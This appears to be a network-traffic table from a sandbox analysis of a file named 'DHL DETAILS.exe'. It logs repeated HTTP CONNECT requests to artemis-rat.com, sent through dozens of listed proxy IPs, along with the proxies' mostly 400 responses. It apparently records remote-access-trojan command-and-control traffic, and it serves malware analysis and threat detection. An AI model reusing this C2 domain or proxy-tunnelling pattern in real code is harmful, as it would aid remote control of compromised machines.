Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.799031019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1229	192.168.2.5	53568	138.36.150.16	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.818443060 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1230	192.168.2.5	53623	121.164.200.18	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.818820953 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1231	192.168.2.5	53562	103.231.78.36	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.830537081 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1232	192.168.2.5	53666	185.162.229.112	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.838165045 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.994396925 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1233	192.168.2.5	53681	185.162.231.254	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.876317978 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.030961037 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1234	192.168.2.5	51789	193.30.13.13	999	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.876319885 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.868494034 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1235	192.168.2.5	53571	202.150.1.87	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.876491070 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1236	192.168.2.5	53629	119.28.4.112	9999	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.876496077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1237	192.168.2.5	53704	104.21.80.83	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.876552105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.031205893 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1238	192.168.2.5	53646	130.162.213.175	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.902762890 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.220717907 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1239	192.168.2.5	53565	140.238.245.116	8100	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.902847052 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:23.108645916 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1240	192.168.2.5	53738	104.17.9.114	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.912478924 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.066945076 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1241	192.168.2.5	53730	185.162.230.178	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.912530899 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.068239927 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1242	192.168.2.5	53735	74.48.7.43	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.912678003 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1243	192.168.2.5	53742	173.245.49.27	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.912758112 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.067095041 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1244	192.168.2.5	53752	104.20.123.164	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.927459002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.082169056 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1245	192.168.2.5	53751	31.43.179.214	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.927460909 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.082233906 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1246	192.168.2.5	53753	172.67.3.98	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.938993931 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.093103886 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1247	192.168.2.5	53649	123.30.154.171	7777	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.948652029 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.313829899 CET	343	IN	HTTP/1.1 400 Bad Request Server: nginx/1.10.3 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1248	192.168.2.5	53648	113.140.74.26	8000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.965786934 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.303200960 CET	922	IN	HTTP/1.1 400 Content-Type: text/html;charset=utf-8 Content-Language: zh-CN Content-Length: 764 Date: Sat, 09 Mar 2024 12:14:17 GMT Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 e7 8a b6 e6 80 81 20 34 30 30 20 2d 20 e9 94 99 e8 af af e7 9a 84 e8 af b7 e6 b1 82 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 e7 8a b6 e6 80 81 20 34 30 30 20 2d 20 e9 94 99 e8 af af e7 9a 84 e8 af b7 e6 b1 82 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e e7 b1 bb e5 9e 8b 3c 2f 62 3e 20 e7 8a b6 e6 80 81 e6 8a a5 e5 91 8a 3c 2f 70 3e 3c 70 3e 3c 62 3e e6 b6 88 e6 81 af 3c 2f 62 3e 20 49 6e 76 61 6c 69 64 20 55 52 49 3c 2f 70 3e 3c 70 3e 3c 62 3e e6 8f 8f e8 bf b0 3c 2f 62 3e 20 e7 94 b1 e4 ba 8e e8 a2 ab e8 ae a4 e4 b8 ba e6 98 af e5 ae a2 e6 88 b7 e7 ab af e5 af b9 e9 94 99 e8 af af ef bc 88 e4 be 8b e5 a6 82 ef bc 9a e7 95 b8 e5 bd a2 e7 9a 84 e8 af b7 e6 b1 82 e8 af ad e6 b3 95 e3 80 81 e6 97 a0 e6 95 88 e7 9a 84 e8 af b7 e6 b1 82 e4 bf a1 e6 81 af e5 b8 a7 e6 88 96 e8 80 85 e8 99 9a e6 8b 9f e7 9a 84 e8 af b7 e6 b1 82 e8 b7 af e7 94 b1 ef bc 89 ef bc 8c e6 9c 8d e5 8a a1 e5 99 a8 e6 97 a0 e6 b3 95 e6 88 96 e4 b8 8d e4 bc 9a e5 a4 84 e7 90 86 e5 bd 93 e5 89 8d e8 af b7 e6 b1 82 e3 80 82 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 35 2e 37 35 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="zh"><head><title>HTTP 400 - </title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP 400 - </h1><hr class="line" /><p><b></b> </p><p><b></b> Invalid URI</p><p><b></b> </p><hr class="line" /><h3>Apache Tomcat/8.5.75</h3></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1249	192.168.2.5	53716	51.222.241.157	27206	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.967132092 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.536459923 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.224344969 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.724183083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1250	192.168.2.5	53658	14.103.24.20	8000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.995776892 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1251	192.168.2.5	53732	64.56.150.102	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.999273062 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
